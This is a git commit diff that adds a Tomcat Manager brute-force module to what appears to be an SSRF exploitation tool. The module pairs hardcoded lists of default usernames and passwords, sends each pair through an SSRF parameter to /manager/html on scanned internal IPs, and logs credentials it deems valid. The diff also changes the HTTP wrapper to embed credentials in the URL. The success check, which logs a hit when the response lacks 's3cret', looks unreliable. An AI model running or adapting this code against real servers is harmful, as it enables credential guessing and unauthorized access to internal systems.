MODULE - Tomcat module - bruteforce attack against manager

pull/7/head
Swissky 2018-12-29 22:12:45 +01:00
parent ec40fe1f91
commit e8751bb51e
4 changed files with 35 additions and 1 deletions

View File

@ -69,6 +69,7 @@ The following modules are already implemented and can be used with the `-m` argu
| `digitalocean` | Read files from the provider (e.g: meta-data, user-data) |
| `socksproxy` | SOCKS4 Proxy |
| `smbhash` | Force an SMB authentication via a UNC Path |
| `tomcat` | Bruteforce attack against Tomcat Manager |
## Contribute

View File

@ -14,7 +14,9 @@ def wrapper_gopher(data, ip, port):
def wrapper_dict(data, ip, port):
return "dict://{}:{}/{}".format(ip, port, data)
def wrapper_http(data, ip, port):
def wrapper_http(data, ip, port, usernm=False, passwd=False):
if usernm != False and passwd != False:
return "http://{}:{}@{}:{}/{}".format(usernm, passwd, ip, port, data)
return "http://{}:{}/{}".format(ip, port, data)
def wrapper_https(data, ip, port):

31
modules/tomcat.py Normal file
View File

@ -0,0 +1,31 @@
from core.utils import *
import logging
name = "tomcat"
description = "Tomcat - Bruteforce manager"
author = "Swissky"
documentation = [
"https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html",
"https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown"
]
class exploit():
SERVER_HOST = "127.0.0.1"
SERVER_PORT = "8888"
SERVER_TOMCAT = "manager/html"
tomcat_user = ["tomcat", "admin", "both", "manager", "role1", "role", "root"]
tomcat_pass = ["password", "tomcat", "admin", "manager", "role1", "changethis", "changeme", "r00t", "root", "s3cret","Password1", "password1"]
def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name))
# Using a generator to create the host list
gen_host = gen_ip_list(self.SERVER_HOST, args.level)
for ip in gen_host:
for usr in self.tomcat_user:
for pss in self.tomcat_pass:
payload = wrapper_http(self.SERVER_TOMCAT, ip, self.SERVER_PORT, usernm=usr, passwd=pss)
r = requester.do_request(args.param, payload)
if not "s3cret" in r.text:
logging.info("Found credential \033[32m{}\033[0m:\033[32m{}\033[0m".format(usr, pss))

Binary file not shown.

After

Width:  |  Height:  |  Size: 21 KiB